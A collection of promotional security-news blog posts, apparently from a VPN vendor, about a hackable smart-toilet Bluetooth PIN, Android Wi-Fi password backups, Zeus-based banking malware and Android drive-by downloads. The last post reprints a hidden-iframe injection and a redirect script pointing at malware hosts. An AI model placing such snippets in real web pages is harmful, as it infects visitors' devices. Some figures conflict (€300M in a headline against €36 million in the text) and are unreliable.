Aw Crap, Toilets are Hackable

Remember when we only had to worry about our computer being hacked? Those were the days. Unfortunately, as technology improves and an ever-increasing number of otherwise mundane devices are outfitted with microchips and wireless connections, we’ve also seen a rise in security vulnerabilities in everything from mobile phones to pacemakers. And now, sadly (or hilariously), even our toilets aren’t safe.

Security company Trustwave issued an advisory last week that LIXIL’s Satis line of smart toilets is vulnerable to hackers with a penchant for pranks. Among the many vital features of the toilets are the capabilities to play music, raise the lid, flush, and operate the bidet with a Bluetooth connection and an Android app. Unfortunately for the unsuspecting toilet enthusiast, LIXIL hard-coded the Bluetooth PIN “0000” into all of their toilets. This means that any ne’er-do-well with a smartphone can download the “My Satis” app and control any Satis toilet.

An attacker could simply download the "My Satis" application and use it to cause the toilet to repeatedly flush, raising the water usage and therefore utility cost to its owner.  Attackers could cause the unit to unexpectedly open/close the lid, activate bidet or air-dry functions, causing discomfort or distress to user. [Trustwave]

Here at SumRando, we’re wondering why anyone would need to remotely access a toilet. Perhaps they just like a fresh bowl?

And while hacking a toilet may be laughable for the security-minded (or anyone), the widespread neglect of basic security precautions in non-traditional wireless devices is a serious issue. Things like computer-controlled power grids, remote-controlled pacemakers, and digital medical records have dramatically improve our quality of life through greater efficiency and accuracy. But as we increase our connectedness, we also open ourselves up to substantial risk. Moving forward, it is essential that we include security and privacy in any discussion relating to technology. Unless we establish and prioritise cybersecurity best practices, we could find our progress flushed down the tubes.

You can try SumRando for free here.

Google Has Your Wi-Fi Password. Does the NSA?

Just in case you haven’t already donned a tinfoil hat in light of Edward Snowden’s NSA revelations, here’s a little extra motivation. According to the Electronic Frontier Foundation (EFF), Android users who use the “back up my data” feature on their devices could be serving up their Wi-Fi passwords to data harvesters like the NSA.

Disclaimer: No evidence exists that the NSA is actually logging passwords and it is irresponsible to suggest otherwise unless actual evidence is provided. EFF has demonstrated that it is simply possible.

“The ‘Back up my data’ option in Android is very convenient,” wrote Micah Lee, staff technologist at the EFF. “However, it means sending a lot of private information, including passwords, in plaintext to Google. This information is vulnerable to government requests for data.” [ArsTechnica]

Ostensibly, Android’s backup feature is outstanding and frankly a responsible thing to use. It sends data including your call logs, system settings, and browser bookmarks to Google’s cloud so they can be easily retrieved should you lose your phone. Unfortunately, since the data is sent in plain text, any information requests could very well include more sensitive data like your Wi-Fi passwords.

“Since backup and restore is such a useful feature, and since it's turned on by default,” wrote Lee, “it's likely that the vast majority of Android users are syncing this data with their Google accounts. Because Android is so popular, it's likely that Google has plaintext Wi-Fi passwords for the majority of password-protected Wi-Fi networks in the world.”

And if that’s not unsettling enough, don’t forget that Google also mapped most of those Wi-Fi networks with their Street View program. It wouldn’t take much to link the location of the network and the corresponding password for anyone interested in snooping.

Have we mentioned you should use a VPN when you’re on Wi-Fi?

Androids getting hacked left and right, crooks make away with €300M

A lot of people I speak with seem to be under the unfortunate impression that smartphones are a safe device for conducting business, banking and other sensitive tasks. Those people would be sad to know that in many countries, the Android IOS is now under more attack than Windows.

In fact, in Australia, more than 10% of Android phones have been attacked within the last six months.

But even knowing that, it was shocking to hear that cybercriminals made away with nearly €36 million using Android-based malware. The malware targeted mobile banking users and siphoned away money by performing automatic transfers. It’s estimated that the crooks made away with €500 to €250,000 per attack.

The attack worked by infecting victims’ PCs and mobiles with a modified version of the Zeus trojan. When victims attempted online bank transactions, the process was intercepted by the trojan. Under the guise of upgrading the online banking software, victims were duped into giving additional information including their mobile phone number, infecting the mobile device. The mobile Trojan worked on both Blackberry and Android devices, giving attackers a wider reach. 

With victims’ PCs and mobile devices compromised, the attackers could intercept and hijack all the victims’ banking transactions, including the key to completing the transaction: the bank’s SMS to the customer containing the ‘transaction authentication number’ (TAN). With the account number, password, and TAN, the attackers were able to stealthily transfer funds out of victims’ accounts while victims were left with the impression that their transaction had completed successfully. [CheckPoint]

Customers at an estimated 30 different banks were affected by the attacks.

This is the kind of thing that can be prevented with just a few precautions. SumRando recommends using a dedicated browser only for online banking. If you normally use Firefox, use Chrome for banking. And certainly try to avoid banking on your smartphone if at all possible.

Just when you thought it was safe to web surf on your Android device…

It might be safe to say that April 2012 will go down in history as the month we realized Macs are not virus-proof. If that’s the case, then May 2012 will go down as the month we realized smartphones aren’t safe either.

For the first time, experts have located legitimate sites that have been hacked and infected with Android drive-by-download malware.

“Drive-by-download” malware is harmful software that is automatically downloaded when a particular website is visited. In this case, the malware, a Trojan called NotCompatible, specifically infects Android devices. It’s important to note that the relevant piece of this story is the fact that the malware was found on legitimate websites that had been hacked and infected.

Hacked websites commonly have the following code inserted into the bottom of each page:

<iframe style="visibility: hidden; display: none; display: none;" src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

When a PC-based web browser accesses the site in question, it returns a “not found” error. When a browser with the word “Android” in its user-agent header accesses the site, however, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>

As a result, the browser immediately attempts to access the page at androidonlinefix.info. Like the previous site, only browsers with the word “Android” in their user-agent string will trigger a download; all other browsers will show a blank page. Since the server returns an Android app, the Android browser automatically downloads it. [ZDNet]

Up until now, the Android DBD Malware had been found only on websites designed by malware distributors specifically for the purpose of hosting the program. The fact that the software is now found on legitimate websites opens the door for large-scale infections.

Presently, the malware presents no known negative effects, but experts believe the current infections are part of a trial run to test the viability of mass distribution.